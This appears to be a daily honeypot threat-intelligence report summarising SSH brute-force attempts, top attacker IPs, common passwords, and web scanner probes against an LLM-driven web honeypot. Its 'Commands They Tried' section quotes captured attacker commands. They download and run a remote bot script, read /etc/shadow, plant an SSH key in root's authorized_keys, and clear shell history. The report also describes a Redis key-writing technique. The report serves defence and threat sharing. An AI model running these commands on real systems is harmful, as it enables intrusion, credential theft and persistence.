Friday, 24 April 2026 ๐Ÿ”ด high

Daily Threat Report

1,243 SSH Connections
3,891 Login Attempts
47 Commands Run
198 SSH Unique IPs
723 Protocol Events
134 Protocol IPs
8 Web Honeypot Hits
3 Web Honeypot IPs

Top Attacker IPs

  1. ๐ŸŒ 185.220.101.47 BGPโ†—
  2. ๐ŸŒ 194.165.16.78 BGPโ†—
  3. ๐ŸŒ 91.92.251.103 BGPโ†—
  4. ๐ŸŒ 45.33.32.156 BGPโ†—
  5. ๐ŸŒ 185.156.73.54 BGPโ†—

Top Passwords Tried

  1. 123456
  2. admin
  3. root
  4. password
  5. 12345

๐ŸŒ WEB HONEYPOT โ€” Galah LLM

AI-generated fake HTTP responses served to 8 scanner requests from 3 unique IPs. Model: qwen2.5:0.5b (local, offline).

Top Paths Probed

  1. /wp-login.php
  2. /admin
  3. /.env
  4. /phpmyadmin/
  5. /cgi-bin/luci

Top User-Agents

  1. sqlmap/1.7.8
  2. Mozilla/5.0 (compatible; Googlebot/2.1)
  3. Masscan/1.3
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
โ†’ 14 IPs โ†’ AbuseIPDB  (community confidence scores updated)
โ†’ 14 IPs โ†’ AlienVault OTX  (pulse indicators added)
โ†’ 14 IPs โ†’ Blocklist.de  (auto-ban list updated)
โ†’ 14 IPs โ†’ DShield/SANS  (global threat feed updated)

๐Ÿคฃ ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

๐Ÿ”‘ Hall of Shame โ€” Passwords

iloveyou
letmein
admin1234
qwerty123
fuckyou
opensesame
password1
123456789

๐Ÿ’ป Commands They Tried

busybox wget http://194.165.16.78/bot.sh -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x
cat /etc/shadow
history -c
chmod 777 /tmp/.x
echo AAAA >> /root/.ssh/authorized_keys
python3 -c import pty;pty.spawn(/bin/bash)

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Over the past 24 hours, the honeypot recorded intense activity. The majority of attackers relied on classic SSH brute-force, cycling through default credentials typically found on routers and IP cameras. Three IPs showed lateral movement patterns after gaining simulated login access, immediately running reconnaissance commands (uname -a, cat /etc/passwd) and attempting to download payloads from known C2 infrastructure via wget.

SSH Activity (Cowrie)

The SSH honeypot logged 1,243 connection attempts and 3,891 login tries from 198 unique IPs. After gaining simulated access, attackers executed 47 commands โ€” the most common being system fingerprinting (uname -a, id, cat /proc/cpuinfo) followed by automated dropper scripts attempting to fetch and execute remote payloads.

Multi-Protocol Activity (OpenCanary)

723 events were detected across 134 unique IPs targeting emulated network services. The most attacked services were:

  • MySQL โ€” repeated access attempts using root with no password, consistent with automated scanners exploiting misconfigured database servers.
  • Redis โ€” exploitation attempts via CONFIG SET to write attacker-controlled SSH public keys into /root/.ssh/authorized_keys, a well-documented Redis RCE vector.

14 IPs were automatically reported to AbuseIPDB, Blocklist.de, SANS DShield, and AlienVault OTX.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 8 HTTP requests from real scanners across 3 unique IPs. This marks the first operational night of the Galah LLM honeypot, live since April 24, 2026. Each attacker received a dynamically generated fake response from the local AI model qwen2.5:0.5b running via Ollama โ€” no internet connection required for inference.

Top probed paths: /wp-login.php, /admin, /.env, /phpmyadmin/, /cgi-bin/luci.

โ† All Reports ๐Ÿ›ก๏ธ Subscribe to blocklists โ†’